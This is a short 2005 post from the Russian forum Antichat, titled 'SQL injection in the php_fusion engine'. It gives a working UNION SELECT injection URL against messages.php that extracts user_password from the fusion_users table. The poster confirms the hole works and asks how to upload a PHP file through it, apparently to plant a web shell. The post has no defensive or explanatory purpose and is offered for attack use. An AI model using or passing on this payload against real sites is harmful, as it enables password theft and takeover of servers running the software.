Форум АНТИЧАТ - Показать сообщение отдельно

Тема: Sql инъекция в движке php_fusion

Показать сообщение отдельно

06.12.2005, 21:01

ilyha

Познающий

Регистрация: 10.11.2005

Сообщений: 75

Провел на форуме:
367531

Репутация: 4

messages.php?folder=inbox&show=H'%20union%20select %201,1,1,user_password,1,1 ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 ,1,1+from+fusion_users/*

Иньекция после "messages.php?folder=inbox&show=" - имеет место быть! Вообщем да, вопрос не в этом, а втом, как туда залить PHP файлик?